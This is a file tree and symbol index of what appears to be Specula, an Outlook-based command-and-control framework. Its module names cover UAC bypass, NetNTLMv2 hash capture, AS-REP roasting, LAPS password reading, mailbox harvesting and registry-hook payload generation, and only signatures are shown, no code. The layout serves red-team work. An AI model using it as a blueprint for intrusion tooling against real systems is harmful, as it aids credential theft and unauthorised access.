│ │ │ ├── list_networklogon.py
│ │ │ ├── list_networklogon.txt
│ │ │ ├── list_ntdomaininfo.py
│ │ │ ├── list_ntdomaininfo.txt
│ │ │ ├── list_officearch.py
│ │ │ ├── list_officearch.txt
│ │ │ ├── list_printers.py
│ │ │ ├── list_printers.txt
│ │ │ ├── list_processes.py
│ │ │ ├── list_processes.txt
│ │ │ ├── list_recentcommands.py
│ │ │ ├── list_recentcommands.txt
│ │ │ ├── list_recentfiles.py
│ │ │ ├── list_recentfiles.txt
│ │ │ ├── list_recyclebin.py
│ │ │ ├── list_recyclebin.txt
│ │ │ ├── list_scheduledtasks.py
│ │ │ ├── list_scheduledtasks.txt
│ │ │ ├── list_servicepermissions.py
│ │ │ ├── list_servicepermissions.txt
│ │ │ ├── list_services.py
│ │ │ ├── list_services.txt
│ │ │ ├── list_startmenu.py
│ │ │ ├── list_startmenu.txt
│ │ │ ├── list_timezone.py
│ │ │ ├── list_timezone.txt
│ │ │ ├── list_whoami.py
│ │ │ ├── list_whoami.txt
│ │ │ ├── list_windowsarch.py
│ │ │ ├── list_windowsarch.txt
│ │ │ ├── list_windowsversion.py
│ │ │ └── list_windowsversion.txt
│ │ └── ldap/
│ │ ├── ldap_query.py
│ │ ├── ldap_query.txt
│ │ ├── list_addcomputertodomain.py
│ │ ├── list_addcomputertodomain.txt
│ │ ├── list_asreproast.py
│ │ ├── list_asreproast.txt
│ │ ├── list_computer.py
│ │ ├── list_computer.txt
│ │ ├── list_computers.py
│ │ ├── list_computers.txt
│ │ ├── list_domaininfo.py
│ │ ├── list_domaininfo.txt
│ │ ├── list_lapspassword.py
│ │ ├── list_lapspassword.txt
│ │ ├── list_passwordnotrequired.py
│ │ ├── list_passwordnotrequired.txt
│ │ ├── list_passwordpolicy.py
│ │ ├── list_passwordpolicy.txt
│ │ ├── list_user.py
│ │ ├── list_user.txt
│ │ ├── list_users.py
│ │ └── list_users.txt
│ ├── execute/
│ │ └── host/
│ │ ├── application.py
│ │ ├── application.txt
│ │ ├── capture_netntlmv2.py
│ │ ├── capture_netntlmv2.txt
│ │ ├── cmd.py
│ │ ├── cmd.txt
│ │ ├── execute_excel4macro.py
│ │ ├── execute_excel4macro.txt
│ │ ├── execute_registerxll.py
│ │ ├── execute_registerxll.txt
│ │ ├── migrate_homepage.py
│ │ ├── migrate_homepage.txt
│ │ ├── remove_homepage.py
│ │ ├── remove_homepage.txt
│ │ ├── set_calendarhomepagehook.py
│ │ ├── set_calendarhomepagehook.txt
│ │ ├── spawnproc_explorer.py
│ │ ├── spawnproc_explorer.txt
│ │ ├── uac-sdclt.py
│ │ ├── uac-sdclt.txt
│ │ ├── wmi_execute.py
│ │ ├── wmi_execute.txt
│ │ ├── wmi_killprocname.py
│ │ ├── wmi_killprocname.txt
│ │ ├── wmi_killprocpid.py
│ │ ├── wmi_killprocpid.txt
│ │ ├── wscriptshell.py
│ │ └── wscriptshell.txt
│ ├── operation/
│ │ ├── file/
│ │ │ ├── cat_file.py
│ │ │ ├── cat_file.txt
│ │ │ ├── check_filearch.py
│ │ │ ├── check_filearch.txt
│ │ │ ├── check_fileexist.py
│ │ │ ├── check_fileexist.txt
│ │ │ ├── check_filehash.py
│ │ │ ├── check_filehash.txt
│ │ │ ├── copy_dir.py
│ │ │ ├── copy_dir.txt
│ │ │ ├── copy_file.py
│ │ │ ├── copy_file.txt
│ │ │ ├── create_dir.py
│ │ │ ├── create_dir.txt
│ │ │ ├── create_shortcut.py
│ │ │ ├── create_shortcut.txt
│ │ │ ├── delete_dir.py
│ │ │ ├── delete_dir.txt
│ │ │ ├── delete_file.py
│ │ │ ├── delete_file.txt
│ │ │ ├── download_filehttp.py
│ │ │ ├── download_filehttp.txt
│ │ │ ├── get_file.py
│ │ │ ├── get_file.txt
│ │ │ ├── list_acl.py
│ │ │ ├── list_acl.txt
│ │ │ ├── list_dir.py
│ │ │ ├── list_dir.txt
│ │ │ ├── list_shortcutinfo.py
│ │ │ ├── list_shortcutinfo.txt
│ │ │ ├── move_file.py
│ │ │ ├── move_file.txt
│ │ │ ├── put_file.py
│ │ │ ├── put_file.txt
│ │ │ ├── split_file.py
│ │ │ ├── split_file.txt
│ │ │ ├── zip_content.py
│ │ │ └── zip_content.txt
│ │ ├── network/
│ │ │ ├── netstat.py
│ │ │ ├── netstat.txt
│ │ │ ├── nslookup.py
│ │ │ └── nslookup.txt
│ │ ├── outlook/
│ │ │ ├── adjust_notifications.py
│ │ │ ├── adjust_notifications.txt
│ │ │ ├── change_outlookfolder.py
│ │ │ ├── change_outlookfolder.txt
│ │ │ ├── changeview_outlookfolder.py
│ │ │ ├── changeview_outlookfolder.txt
│ │ │ ├── delete_mail.py
│ │ │ ├── delete_mail.txt
│ │ │ ├── dump_gal.py
│ │ │ ├── dump_gal.txt
│ │ │ ├── get_emailaddress.py
│ │ │ ├── get_emailaddress.txt
│ │ │ ├── list_notifications.py
│ │ │ ├── list_notifications.txt
│ │ │ ├── list_overview.py
│ │ │ ├── list_overview.txt
│ │ │ ├── read_calendar.py
│ │ │ ├── read_calendar.txt
│ │ │ ├── read_contacts.py
│ │ │ ├── read_contacts.txt
│ │ │ ├── read_email.py
│ │ │ ├── read_email.txt
│ │ │ ├── read_emailnamedfolder.py
│ │ │ ├── read_emailnamedfolder.txt
│ │ │ ├── read_other.py
│ │ │ ├── read_other.txt
│ │ │ ├── savedraft_filemail.py
│ │ │ ├── savedraft_filemail.txt
│ │ │ ├── search_email.py
│ │ │ ├── search_email.txt
│ │ │ ├── send_mail.py
│ │ │ ├── send_mail.txt
│ │ │ ├── sendfile_mail.py
│ │ │ ├── sendfile_mail.txt
│ │ │ ├── stop_outlook.py
│ │ │ └── stop_outlook.txt
│ │ ├── registry/
│ │ │ ├── delkeyhkcuregistry.py
│ │ │ ├── delkeyhkcuregistry.txt
│ │ │ ├── delvaluehkcuregistry.py
│ │ │ ├── delvaluehkcuregistry.txt
│ │ │ ├── getallkeysregistry.py
│ │ │ ├── getallkeysregistry.txt
│ │ │ ├── getallvaluesregistry.py
│ │ │ ├── getallvaluesregistry.txt
│ │ │ ├── getvalueregistry.py
│ │ │ ├── getvalueregistry.txt
│ │ │ ├── setvaluehkcuregistry.py
│ │ │ └── setvaluehkcuregistry.txt
│ │ └── specula/
│ │ ├── remove_allowlongscriptruntime.py
│ │ ├── remove_allowlongscriptruntime.txt
│ │ ├── set_allowlongscriptruntime.py
│ │ └── set_allowlongscriptruntime.txt
│ └── trolling/
│ ├── play_voice.py
│ ├── play_voice.txt
│ ├── set_clipboard.py
│ └── set_clipboard.txt
├── helperFunctions/
│ ├── Delregkey_hkcu.txt
│ ├── Delregvalue_hkcu.txt
│ ├── Getallregkeys.txt
│ ├── Getallregvalues.txt
│ ├── Getregvalue.txt
│ ├── HexToBytes.txt
│ ├── Setregvalue_hkcu.txt
│ ├── base64.txt
│ ├── base_template.txt
│ ├── createstream.txt
│ ├── dir_creator.txt
│ ├── dir_lister.txt
│ └── supportFuncs.txt
├── hiddenFunctions/
│ ├── downloadGAL.py
│ ├── downloadGAL.txt
│ ├── download_file.py
│ ├── download_file.txt
│ ├── upload_file.py
│ └── upload_file.txt
├── hooker_generator.py
├── lib/
│ ├── core/
│ │ ├── helpers.py
│ │ ├── setup.py
│ │ ├── specagents.py
│ │ ├── specmodule.py
│ │ ├── specpayload.py
│ │ ├── spectaskbook.py
│ │ ├── utility.py
│ │ └── utils.py
│ ├── handlers/
│ │ ├── base.html
│ │ ├── blacklist.html
│ │ ├── dev_blank.html
│ │ ├── dev_encrypted_task_template.html
│ │ ├── dev_unencrypted_task_template.html
│ │ ├── redirect_template.html
│ │ ├── specapplication.py
│ │ ├── speccomms.py
│ │ ├── specdevcomms.py
│ │ ├── specpayload.py
│ │ ├── specvalidate.py
│ │ └── validation.html
│ ├── menu/
│ │ ├── specpromptdbedit.py
│ │ ├── specpromptexplorer.py
│ │ ├── specpromptinteract.py
│ │ ├── specpromptmodule.py
│ │ ├── specpromptpayload.py
│ │ ├── specpromptprestage.py
│ │ └── specpromptpushover.py
│ ├── modhandlers/
│ │ └── generic.py
│ ├── tab_completers/
│ │ └── generic.py
│ └── validators/
│ ├── files.py
│ └── generic.py
├── release_history.txt
├── requirements.txt
├── specula.py
└── ssl/
├── ssl-cert-snakeoil.key
└── ssl-cert-snakeoil.pem
SYMBOL INDEX (667 symbols across 150 files)
FILE: Taskbooks/enum_installed_software.py
function TaskBook (line 1) | def TaskBook(helpers, agent):
FILE: Taskbooks/example.py
function TaskBook (line 1) | def TaskBook(helpers, agent):
FILE: api/SpeculaApi/Sepcula.h
function BEGIN_COM_MAP (line 27) | DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA)
function FinalRelease (line 44) | void FinalRelease()
FILE: api/SpeculaApi/SpeculaApi.cpp
function _Use_decl_annotations_ (line 14) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 21) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 28) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 37) | _Use_decl_annotations_
function STDAPI (line 45) | STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
FILE: api/SpeculaApi/SpeculaApi_i.h
type interface (line 57) | typedef interface ISepcula ISepcula;
type class (line 66) | typedef class Sepcula Sepcula;
type Sepcula (line 68) | typedef struct Sepcula Sepcula;
type ISepculaVtbl (line 114) | typedef struct ISepculaVtbl
function interface (line 191) | interface ISepcula
FILE: api/SpeculaApi/dllmain.cpp
function BOOL (line 12) | BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
FILE: api/SpeculaApi/dllmain.h
function class (line 3) | class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >
FILE: functions/api/install_api.py
class Spec (line 8) | class Spec(SpecModule):
method __init__ (line 9) | def __init__(self, templatepath, helpers):
method rethandler (line 34) | def rethandler(self, agent, options, data):
FILE: functions/api/load_dll.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
method preprocess (line 20) | def preprocess(self, agent):
FILE: functions/api/remove_api.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method preprocess (line 28) | def preprocess(self, agent):
method rethandler (line 36) | def rethandler(self, agent, options, data):
FILE: functions/api/run_shell.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
method preprocess (line 20) | def preprocess(self, agent):
FILE: functions/api/verify_api.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 19) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_amsiproviders.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_applocker.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_autoruns.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 43) | def preprocess(self, agent):
FILE: functions/enumerate/host/list_basic.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 25) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_boottime.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_clipboard.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_environmentvariables.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_gpp.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_hostsfile.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_hotfixes.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installedapps.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installeddotnet.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installedpowershell.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_iprouting.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_localadmins.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_localusers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_logging.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_mappeddrives.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_networkcardinfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_networklogon.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_ntdomaininfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_officearch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_printers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_processes.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recentcommands.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recentfiles.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recyclebin.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_scheduledtasks.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_servicepermissions.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_services.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_startmenu.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_timezone.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 24) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_whoami.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 24) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_windowsarch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_windowsversion.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/ldap/ldap_query.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 55) | def preprocess(self, agent):
FILE: functions/enumerate/ldap/list_addcomputertodomain.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_asreproast.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_computer.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_computers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_domaininfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_lapspassword.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_passwordnotrequired.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_passwordpolicy.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_user.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_users.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/application.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/capture_netntlmv2.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method preprocess (line 48) | def preprocess(self, agent):
FILE: functions/execute/host/cmd.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/execute_excel4macro.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/execute_registerxll.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/migrate_homepage.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/remove_homepage.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/set_calendarhomepagehook.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 35) | def preprocess(self, agent):
FILE: functions/execute/host/spawnproc_explorer.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/uac-sdclt.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_execute.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_killprocname.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_killprocpid.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wscriptshell.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/cat_file.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 39) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/check_filearch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/check_fileexist.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/check_filehash.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/copy_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/copy_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/create_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/create_shortcut.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 78) | def preprocess(self, agent):
FILE: functions/operation/file/delete_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/delete_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/download_filehttp.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/get_file.py
class Spec (line 10) | class Spec(SpecModule):
method __init__ (line 11) | def __init__(self, templatepath, helpers):
method rethandler (line 48) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/list_acl.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/list_dir.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 108) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/list_shortcutinfo.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/move_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/put_file.py
class Spec (line 10) | class Spec(SpecModule):
method __init__ (line 11) | def __init__(self, templatepath, helpers):
method preprocess (line 58) | def preprocess(self, agent):
method rethandler (line 98) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/split_file.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/zip_content.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/network/netstat.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/network/nslookup.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/adjust_notifications.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/change_outlookfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/changeview_outlookfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/delete_mail.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/dump_gal.py
class Spec (line 8) | class Spec(SpecModule):
method __init__ (line 9) | def __init__(self, templatepath, helpers):
method rethandler (line 38) | def rethandler(self, agent, options, data):
FILE: functions/operation/outlook/get_emailaddress.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/list_notifications.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/list_overview.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_calendar.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_contacts.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_email.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 54) | def preprocess(self, agent):
FILE: functions/operation/outlook/read_emailnamedfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_other.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 44) | def preprocess(self, agent):
FILE: functions/operation/outlook/savedraft_filemail.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/search_email.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 119) | def preprocess(self, agent):
FILE: functions/operation/outlook/send_mail.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/sendfile_mail.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/stop_outlook.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/delkeyhkcuregistry.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/delvaluehkcuregistry.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/getallkeysregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 70) | def preprocess(self, agent):
FILE: functions/operation/registry/getallvaluesregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 76) | def preprocess(self, agent):
FILE: functions/operation/registry/getvalueregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 84) | def preprocess(self, agent):
FILE: functions/operation/registry/setvaluehkcuregistry.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
FILE: functions/operation/specula/remove_allowlongscriptruntime.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/specula/set_allowlongscriptruntime.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/trolling/play_voice.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/trolling/set_clipboard.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: hiddenFunctions/downloadGAL.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
method rethandler (line 45) | def rethandler(self, agent, options, data):
FILE: hiddenFunctions/download_file.py
class Spec (line 9) | class Spec(SpecModule):
method __init__ (line 10) | def __init__(self, templatepath, helpers):
method rethandler (line 53) | def rethandler(self, agent, options, data):
FILE: hiddenFunctions/upload_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 39) | def rethandler(self, agent, options, data):
FILE: hooker_generator.py
function logo (line 5) | def logo():
class Payloads (line 43) | class Payloads:
method __init__ (line 44) | def __init__(self, url, encryptionkey, version, activex, outputpath, j...
method gen_registry_hooker (line 60) | def gen_registry_hooker(self):
method gen_outfile_registry_hooker (line 152) | def gen_outfile_registry_hooker(self):
function main (line 157) | def main():
FILE: lib/core/helpers.py
class Helpers (line 22) | class Helpers:
method __init__ (line 23) | def __init__(self, weblog): #DATABASEFILENAME
method complete_path (line 48) | def complete_path(path, line, **kwargs):
method getpayloaddir (line 54) | def getpayloaddir(self):
method getarguments (line 58) | def getarguments(cmd):
method insertTask (line 66) | def insertTask(self, agent, module, name):
method setModOption (line 78) | def setModOption(mod, optname, optval=None, prompt="value: "):
method addJitter (line 88) | def addJitter(self, jitter, time):
method sendPush (line 94) | def sendPush(self, ip, hostname, msg):
method renderModule (line 118) | def renderModule(self, module, agent):
method parseURI (line 143) | def parseURI(uri):
method closelog (line 154) | def closelog(self): # this is only being used because tornado is a PIT...
method speclog (line 159) | def speclog(self, logline, output=False):
method operatorlog (line 166) | def operatorlog(self, logline, output=False):
method get_module (line 174) | def get_module(self, p, hidden=False):
method loadTaskBooks (line 183) | def loadTaskBooks(self, path):
method loadModules (line 197) | def loadModules(self, path, hidden=False):
method loadModule (line 218) | def loadModule(self, path):
method save_agents_to_file (line 229) | def save_agents_to_file(self, filename = None):
method load_agents_from_file (line 235) | def load_agents_from_file(self, filename = None):
method save_payloads_to_file (line 242) | def save_payloads_to_file(self, filename = None):
method load_payloads_from_file (line 248) | def load_payloads_from_file(self, filename = None):
